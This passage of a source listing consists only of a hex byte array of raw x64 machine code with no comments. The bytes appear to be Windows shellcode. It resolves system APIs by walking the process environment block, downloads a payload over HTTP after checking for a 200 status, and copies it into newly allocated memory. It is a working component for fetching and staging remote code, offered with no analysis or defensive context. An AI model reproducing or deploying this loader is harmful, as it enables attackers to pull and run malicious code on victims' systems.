423 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x01, 0x00, 0x00, 0x48, 0x01,
424 0xd0, 0x0f, 0xb7, 0x00, 0x0f, 0xb7, 0xc0, 0x48, 0x8d, 0x14, 0x85, 0x00,
425 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x01,
426 0xd0, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00,
427 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x48, 0x8b,
428 0x85, 0xd0, 0x01, 0x00, 0x00, 0x48, 0x3b, 0x85, 0xa8, 0x01, 0x00, 0x00,
429 0x0f, 0x82, 0x73, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb8, 0x01, 0x00,
430 0x00, 0x8b, 0x40, 0x04, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00,
431 0x00, 0x48, 0x01, 0xd0, 0x48, 0x39, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x0f,
432 0x83, 0x50, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd0, 0x01, 0x00, 0x00,
433 0x48, 0x89, 0x85, 0x70, 0x01, 0x00, 0x00, 0xc7, 0x85, 0xdc, 0x01, 0x00,
434 0x00, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x3b, 0x8b, 0x95, 0xdc, 0x01, 0x00,
435 0x00, 0x48, 0x8b, 0x85, 0x70, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f,
436 0xb6, 0x10, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x88, 0x54, 0x05, 0x20,
437 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x01, 0x00,
438 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x3c, 0x2e, 0x74, 0x29, 0x83,
439 0x85, 0xdc, 0x01, 0x00, 0x00, 0x01, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00,
440 0x48, 0x8b, 0x85, 0x70, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6,
441 0x00, 0x84, 0xc0, 0x74, 0x0c, 0x83, 0xbd, 0xdc, 0x01, 0x00, 0x00, 0x3b,
442 0x76, 0xa5, 0xeb, 0x01, 0x90, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x83,
443 0xc0, 0x01, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0x20, 0x64, 0x8b, 0x85, 0xdc,
444 0x01, 0x00, 0x00, 0x83, 0xc0, 0x02, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0x20,
445 0x6c, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x83, 0xc0, 0x03, 0x89, 0xc0,
446 0xc6, 0x44, 0x05, 0x20, 0x6c, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x83,
447 0xc0, 0x04, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0x20, 0x00, 0x8b, 0x85, 0xdc,
448 0x01, 0x00, 0x00, 0x83, 0xc0, 0x01, 0x89, 0xc0, 0x48, 0x01, 0x85, 0x70,
449 0x01, 0x00, 0x00, 0xc7, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
450 0x00, 0xeb, 0x24, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
451 0x70, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x10, 0x8b, 0x85,
452 0xdc, 0x01, 0x00, 0x00, 0x88, 0x54, 0x05, 0xa0, 0x83, 0x85, 0xdc, 0x01,
453 0x00, 0x00, 0x01, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
454 0x70, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0,
455 0x74, 0x09, 0x83, 0xbd, 0xdc, 0x01, 0x00, 0x00, 0x7e, 0x76, 0xbc, 0x8b,
456 0x85, 0xdc, 0x01, 0x00, 0x00, 0xc6, 0x44, 0x05, 0xa0, 0x00, 0x48, 0x8d,
457 0x4d, 0xa0, 0x48, 0x8d, 0x55, 0x20, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00,
458 0x00, 0x49, 0x89, 0xc9, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b,
459 0x8d, 0xf0, 0x01, 0x00, 0x00, 0xe8, 0x43, 0xf6, 0xff, 0xff, 0x48, 0x89,
460 0x85, 0xd0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd0, 0x01, 0x00, 0x00,
461 0xeb, 0x25, 0x83, 0xad, 0xd8, 0x01, 0x00, 0x00, 0x01, 0x83, 0xbd, 0xd8,
462 0x01, 0x00, 0x00, 0x00, 0x74, 0x0e, 0x48, 0x83, 0xbd, 0xd0, 0x01, 0x00,
463 0x00, 0x00, 0x0f, 0x84, 0xb0, 0xfd, 0xff, 0xff, 0x48, 0x8b, 0x85, 0xd0,
464 0x01, 0x00, 0x00, 0x48, 0x81, 0xc4, 0x60, 0x02, 0x00, 0x00, 0x5d, 0xc3,
465 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x50, 0x48, 0x89, 0x4d, 0x10,
466 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x48, 0xc7, 0x45, 0xf0,
467 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xdc, 0x30, 0x00, 0x00, 0x00, 0x8b,
468 0x45, 0xdc, 0x65, 0x48, 0x8b, 0x00, 0x48, 0x89, 0x45, 0xd0, 0x48, 0x8b,
469 0x45, 0xd0, 0x48, 0x8b, 0x40, 0x60, 0x48, 0x89, 0x45, 0xe8, 0x48, 0x8b,
470 0x45, 0xe8, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x89, 0x45, 0xe0, 0x48, 0x8b,
471 0x45, 0xe0, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x89, 0x45, 0xf8, 0xeb, 0x31,
472 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x4d, 0x20,
473 0x48, 0x8b, 0x55, 0x18, 0x49, 0x89, 0xc9, 0x49, 0x89, 0xd0, 0x48, 0x89,
474 0xc2, 0x48, 0x8b, 0x4d, 0x10, 0xe8, 0x72, 0xfb, 0xff, 0xff, 0x48, 0x89,
475 0x45, 0xf0, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x89, 0x45,
476 0xf8, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x85, 0xc0,
477 0x74, 0x07, 0x48, 0x83, 0x7d, 0xf0, 0x00, 0x74, 0xbb, 0x48, 0x8b, 0x45,
478 0xf0, 0x48, 0x83, 0xc4, 0x50, 0x5d, 0xc3, 0x55, 0x56, 0x53, 0x48, 0x81,
479 0xec, 0xd0, 0x03, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00,
480 0x00, 0x48, 0x89, 0x8d, 0x70, 0x03, 0x00, 0x00, 0x48, 0xc7, 0x85, 0x48,
481 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x85, 0xe0, 0x02, 0x00,
482 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x85, 0x44, 0x03, 0x00, 0x00, 0x00,
483 0x00, 0x00, 0x00, 0xc7, 0x85, 0x3c, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00,
484 0x00, 0xc7, 0x85, 0x38, 0x03, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x48,
485 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xf8, 0x01, 0x00,
486 0x00, 0x48, 0x89, 0x85, 0x30, 0x03, 0x00, 0x00, 0xc7, 0x85, 0x40, 0x03,
487 0x00, 0x00, 0x00, 0x03, 0x60, 0x04, 0x48, 0x8d, 0x85, 0x70, 0x02, 0x00,
488 0x00, 0x41, 0xb8, 0x68, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00,
489 0x48, 0x89, 0xc1, 0xe8, 0xd8, 0x4d, 0x00, 0x00, 0xc7, 0x85, 0x70, 0x02,
490 0x00, 0x00, 0x68, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x85, 0x60, 0x01, 0x00,
491 0x00, 0x48, 0x89, 0x85, 0x88, 0x02, 0x00, 0x00, 0xc7, 0x85, 0x90, 0x02,
492 0x00, 0x00, 0x04, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x45, 0x50, 0x48, 0x89,
493 0x85, 0xb8, 0x02, 0x00, 0x00, 0xc7, 0x85, 0xc0, 0x02, 0x00, 0x00, 0x04,
494 0x01, 0x00, 0x00, 0x48, 0x8d, 0x45, 0x10, 0x48, 0x89, 0x85, 0x98, 0x02,
495 0x00, 0x00, 0xc7, 0x85, 0xa0, 0x02, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
496 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0x85, 0xa8, 0x02, 0x00, 0x00, 0xc7,
497 0x85, 0xb0, 0x02, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85,
498 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x20, 0x01, 0x00, 0x00, 0x48,
499 0x8b, 0x95, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8d, 0x8a, 0xf8, 0x08, 0x00,
500 0x00, 0x48, 0x8d, 0x95, 0x70, 0x02, 0x00, 0x00, 0x49, 0x89, 0xd1, 0x41,
501 0xb8, 0x00, 0x00, 0x00, 0x10, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0,
502 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x89, 0x07,
503 0x00, 0x00, 0x8b, 0x85, 0x84, 0x02, 0x00, 0x00, 0x83, 0xf8, 0x04, 0x0f,
504 0x94, 0xc0, 0x0f, 0xb6, 0xc0, 0x89, 0x85, 0x3c, 0x03, 0x00, 0x00, 0x83,
505 0xbd, 0x3c, 0x03, 0x00, 0x00, 0x00, 0x74, 0x1d, 0x81, 0x8d, 0x40, 0x03,
506 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x83, 0xbd, 0x38, 0x03, 0x00, 0x00,
507 0x00, 0x74, 0x0a, 0x81, 0x8d, 0x40, 0x03, 0x00, 0x00, 0x00, 0x30, 0x00,
508 0x00, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x28,
509 0x01, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x41,
510 0xb9, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xba,
511 0x00, 0x00, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48,
512 0x89, 0x85, 0x28, 0x03, 0x00, 0x00, 0x48, 0x83, 0xbd, 0x28, 0x03, 0x00,
513 0x00, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x05, 0x07,
514 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x4c, 0x8b, 0x90,
515 0x30, 0x01, 0x00, 0x00, 0x0f, 0xb7, 0x85, 0x94, 0x02, 0x00, 0x00, 0x0f,
516 0xb7, 0xc8, 0x48, 0x8d, 0x95, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
517 0x28, 0x03, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x38, 0x00, 0x00, 0x00,
518 0x00, 0xc7, 0x44, 0x24, 0x30, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24,
519 0x28, 0x03, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00,
520 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x41, 0x89, 0xc8, 0x48,
521 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x48, 0x89, 0x85, 0x20, 0x03, 0x00, 0x00,
522 0x48, 0x83, 0xbd, 0x20, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x84, 0xba, 0x05,
523 0x00, 0x00, 0x8b, 0x85, 0xc0, 0x02, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x08,
524 0xc6, 0x45, 0x50, 0x2f, 0xc6, 0x45, 0x51, 0x00, 0x48, 0x8b, 0x85, 0x70,
525 0x03, 0x00, 0x00, 0x4c, 0x8b, 0x90, 0x58, 0x01, 0x00, 0x00, 0x48, 0x8d,
526 0x4d, 0x50, 0x48, 0x8b, 0x85, 0x20, 0x03, 0x00, 0x00, 0x48, 0xc7, 0x44,
527 0x24, 0x38, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x95, 0x40, 0x03, 0x00, 0x00,
528 0x89, 0x54, 0x24, 0x30, 0x48, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x00, 0x00,
529 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb9,
530 0x00, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc8, 0xba, 0x00, 0x00, 0x00, 0x00,
531 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x48, 0x89, 0x85, 0x18, 0x03, 0x00,
532 0x00, 0x48, 0x83, 0xbd, 0x18, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x27,
533 0x05, 0x00, 0x00, 0x83, 0xbd, 0x3c, 0x03, 0x00, 0x00, 0x00, 0x74, 0x53,
534 0x8b, 0x85, 0x40, 0x03, 0x00, 0x00, 0x25, 0x00, 0x10, 0x00, 0x00, 0x85,
535 0xc0, 0x74, 0x44, 0xc7, 0x85, 0x14, 0x03, 0x00, 0x00, 0x04, 0x00, 0x00,
536 0x00, 0xc7, 0x85, 0xec, 0x02, 0x00, 0x00, 0x80, 0x33, 0x00, 0x00, 0x48,
537 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x4c, 0x8b, 0x90, 0x38, 0x01, 0x00,
538 0x00, 0x48, 0x8d, 0x95, 0xec, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x18,
539 0x03, 0x00, 0x00, 0x41, 0xb9, 0x04, 0x00, 0x00, 0x00, 0x49, 0x89, 0xd0,
540 0xba, 0x1f, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x8b,
541 0x85, 0xa0, 0x02, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x39, 0x48, 0x8b, 0x85,
542 0x70, 0x03, 0x00, 0x00, 0x4c, 0x8b, 0x90, 0x38, 0x01, 0x00, 0x00, 0x8b,
543 0x8d, 0xa0, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x98, 0x02, 0x00, 0x00,
544 0x48, 0x8b, 0x85, 0x18, 0x03, 0x00, 0x00, 0x41, 0x89, 0xc9, 0x49, 0x89,
545 0xd0, 0xba, 0x1c, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2,
546 0x89, 0x85, 0x44, 0x03, 0x00, 0x00, 0x8b, 0x85, 0xb0, 0x02, 0x00, 0x00,
547 0x85, 0xc0, 0x74, 0x39, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x4c,
548 0x8b, 0x90, 0x38, 0x01, 0x00, 0x00, 0x8b, 0x8d, 0xb0, 0x02, 0x00, 0x00,
549 0x48, 0x8b, 0x95, 0xa8, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x18, 0x03,
550 0x00, 0x00, 0x41, 0x89, 0xc9, 0x49, 0x89, 0xd0, 0xba, 0x1d, 0x00, 0x00,
551 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x89, 0x85, 0x44, 0x03, 0x00,
552 0x00, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x4c, 0x8b, 0x90, 0x60,
553 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x18, 0x03, 0x00, 0x00, 0xc7, 0x44,
554 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00,
555 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48,
556 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x85, 0xc0, 0x0f, 0x84, 0xe8, 0x02, 0x00,
557 0x00, 0xc7, 0x85, 0xe4, 0x02, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0xc7,
558 0x85, 0xe0, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85,
559 0x70, 0x03, 0x00, 0x00, 0x4c, 0x8b, 0x90, 0x68, 0x01, 0x00, 0x00, 0x48,
560 0x8d, 0x8d, 0xe4, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x95, 0xe0, 0x02, 0x00,
561 0x00, 0x48, 0x8b, 0x85, 0x18, 0x03, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24,
562 0x20, 0x00, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc9, 0x49, 0x89, 0xd0, 0xba,
563 0x13, 0x00, 0x00, 0x20, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x85, 0xc0,
564 0x0f, 0x84, 0x8f, 0x02, 0x00, 0x00, 0x8b, 0x85, 0xe0, 0x02, 0x00, 0x00,
565 0x3d, 0xc8, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x7e, 0x02, 0x00, 0x00, 0xc7,
566 0x85, 0xe4, 0x02, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0xc7, 0x85, 0xf0,
567 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x03,
568 0x00, 0x00, 0x4c, 0x8b, 0x90, 0x68, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x8d,
569 0xe4, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x95, 0xf0, 0x02, 0x00, 0x00, 0x48,
570 0x8b, 0x85, 0x18, 0x03, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x00,
571 0x00, 0x00, 0x00, 0x49, 0x89, 0xc9, 0x49, 0x89, 0xd0, 0xba, 0x05, 0x00,
572 0x00, 0x20, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x89, 0x85, 0x10, 0x03,
573 0x00, 0x00, 0x83, 0xbd, 0x10, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x80,
574 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b,
575 0x80, 0xc8, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x3d, 0x76, 0x2f, 0x00, 0x00,
576 0x0f, 0x85, 0xff, 0x01, 0x00, 0x00, 0xc7, 0x85, 0xf0, 0x02, 0x00, 0x00,
577 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x4c,
578 0x8b, 0x90, 0x50, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x95, 0xf4, 0x02, 0x00,
579 0x00, 0x48, 0x8b, 0x85, 0x18, 0x03, 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00,
580 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41,
581 0xff, 0xd2, 0x89, 0x85, 0x10, 0x03, 0x00, 0x00, 0x83, 0xbd, 0x10, 0x03,
582 0x00, 0x00, 0x00, 0x0f, 0x84, 0xb4, 0x01, 0x00, 0x00, 0x8b, 0x85, 0xf4,
583 0x02, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0xa6, 0x01, 0x00, 0x00, 0x48,
584 0x83, 0xbd, 0x48, 0x03, 0x00, 0x00, 0x00, 0x75, 0x49, 0x48, 0x8b, 0x85,
585 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x98, 0xa8, 0x00, 0x00, 0x00, 0x8b,
586 0x85, 0xf4, 0x02, 0x00, 0x00, 0x89, 0xc6, 0x48, 0x8b, 0x85, 0x70, 0x03,
587 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x49,
588 0x89, 0xf0, 0xba, 0x01, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd3,
589 0x48, 0x89, 0x85, 0x48, 0x03, 0x00, 0x00, 0x48, 0x83, 0xbd, 0x48, 0x03,
590 0x00, 0x00, 0x00, 0x75, 0x5f, 0xe9, 0x53, 0x01, 0x00, 0x00, 0x48, 0x8b,
591 0x85, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x98, 0xb0, 0x00, 0x00, 0x00,
592 0x8b, 0x95, 0xf0, 0x02, 0x00, 0x00, 0x8b, 0x85, 0xf4, 0x02, 0x00, 0x00,
593 0x01, 0xd0, 0x89, 0xc6, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x48,
594 0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x8b, 0x95, 0x48,
595 0x03, 0x00, 0x00, 0x49, 0x89, 0xf1, 0x49, 0x89, 0xd0, 0xba, 0x01, 0x00,
596 0x00, 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd3, 0x48, 0x89, 0x85, 0x48, 0x03,
597 0x00, 0x00, 0x48, 0x83, 0xbd, 0x48, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x84,
598 0xf8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x4c,
599 0x8b, 0x90, 0x40, 0x01, 0x00, 0x00, 0x8b, 0x8d, 0xf4, 0x02, 0x00, 0x00,
600 0x8b, 0x85, 0xf0, 0x02, 0x00, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x48,
601 0x03, 0x00, 0x00, 0x48, 0x01, 0xc2, 0x4c, 0x8d, 0x85, 0xe8, 0x02, 0x00,
602 0x00, 0x48, 0x8b, 0x85, 0x18, 0x03, 0x00, 0x00, 0x4d, 0x89, 0xc1, 0x41,
603 0x89, 0xc8, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x89, 0x85, 0x10, 0x03,
604 0x00, 0x00, 0x8b, 0x95, 0xf0, 0x02, 0x00, 0x00, 0x8b, 0x85, 0xf4, 0x02,
605 0x00, 0x00, 0x01, 0xd0, 0x89, 0x85, 0xf0, 0x02, 0x00, 0x00, 0xe9, 0xa5,
606 0xfe, 0xff, 0xff, 0x8b, 0x85, 0xf0, 0x02, 0x00, 0x00, 0x85, 0xc0, 0x0f,
607 0x84, 0x8c, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00,
608 0x48, 0x8b, 0x98, 0xa8, 0x00, 0x00, 0x00, 0x8b, 0x85, 0xf0, 0x02, 0x00,
609 0x00, 0x89, 0xc6, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b,
610 0x80, 0xb8, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x49, 0x89, 0xf0, 0xba, 0x01,
611 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd3, 0x48, 0x89, 0x85, 0x48,
612 0x03, 0x00, 0x00, 0x48, 0x83, 0xbd, 0x48, 0x03, 0x00, 0x00, 0x00, 0x74,
613 0x48, 0xc7, 0x85, 0xe8, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48,
614 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x4c, 0x8b, 0x90, 0x40, 0x01, 0x00,
615 0x00, 0x8b, 0x8d, 0xf0, 0x02, 0x00, 0x00, 0x4c, 0x8d, 0x85, 0xe8, 0x02,
616 0x00, 0x00, 0x48, 0x8b, 0x95, 0x48, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85,
617 0x18, 0x03, 0x00, 0x00, 0x4d, 0x89, 0xc1, 0x41, 0x89, 0xc8, 0x48, 0x89,
618 0xc1, 0x41, 0xff, 0xd2, 0x89, 0x85, 0x44, 0x03, 0x00, 0x00, 0xeb, 0x01,
619 0x90, 0x48, 0x83, 0xbd, 0x48, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x84, 0xf9,
620 0x00, 0x00, 0x00, 0x8b, 0x85, 0xf0, 0x02, 0x00, 0x00, 0x85, 0xc0, 0x0f,
621 0x84, 0xeb, 0x00, 0x00, 0x00, 0x8b, 0x85, 0xf0, 0x02, 0x00, 0x00, 0x89,
622 0xc0, 0x48, 0x89, 0x45, 0xc8, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00,
623 0x48, 0x05, 0x30, 0x0d, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0xc8, 0x48, 0x8b,
624 0x95, 0x30, 0x03, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x30, 0xc7, 0x44,
625 0x24, 0x28, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x30,
626 0x00, 0x00, 0x49, 0x89, 0xc9, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48,
627 0x89, 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0xb5, 0x4f,
628 0x00, 0x00, 0x89, 0x85, 0x0c, 0x03, 0x00, 0x00, 0x83, 0xbd, 0x0c, 0x03,
629 0x00, 0x00, 0x00, 0x78, 0x32, 0x8b, 0x8d, 0xf0, 0x02, 0x00, 0x00, 0x48,
630 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x30, 0x0d, 0x00,
631 0x00, 0x48, 0x8b, 0x95, 0x48, 0x03, 0x00, 0x00, 0x41, 0x89, 0xc8, 0x48,
632 0x89, 0xc1, 0xe8, 0x69, 0x47, 0x00, 0x00, 0xc7, 0x85, 0x44, 0x03, 0x00,
633 0x00, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x0a, 0xc7, 0x85, 0x44, 0x03, 0x00,
634 0x00, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x95, 0xf0, 0x02, 0x00, 0x00, 0x48,
635 0x8b, 0x85, 0x48, 0x03, 0x00, 0x00, 0x41, 0x89, 0xd0, 0xba, 0x00, 0x00,
636 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0xf2, 0x46, 0x00, 0x00, 0x48, 0x8b,
637 0x85, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x98, 0xc0, 0x00, 0x00, 0x00,
638 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb8, 0x00,
639 0x00, 0x00, 0xff, 0xd0, 0x48, 0x8b, 0x95, 0x48, 0x03, 0x00, 0x00, 0x49,
640 0x89, 0xd0, 0xba, 0x01, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd3,
641 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x90, 0x48, 0x01,
642 0x00, 0x00, 0x48, 0x8b, 0x85, 0x18, 0x03, 0x00, 0x00, 0x48, 0x89, 0xc1,
643 0xff, 0xd2, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x90,
644 0x48, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x20, 0x03, 0x00, 0x00, 0x48,
645 0x89, 0xc1, 0xff, 0xd2, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x48,
646 0x8b, 0x90, 0x48, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x28, 0x03, 0x00,
647 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x83, 0xbd, 0x44, 0x03, 0x00, 0x00,
648 0x00, 0x0f, 0x84, 0xb2, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x03,
649 0x00, 0x00, 0x8b, 0x80, 0x04, 0x02, 0x00, 0x00, 0x83, 0xf8, 0x03, 0x0f,
650 0x85, 0x9c, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00,
651 0x48, 0x8b, 0x80, 0x30, 0x0d, 0x00, 0x00, 0x48, 0x89, 0x85, 0x00, 0x03,
652 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x80,
653 0x28, 0x0d, 0x00, 0x00, 0x41, 0x89, 0xc0, 0x48, 0x8b, 0x85, 0x70, 0x03,
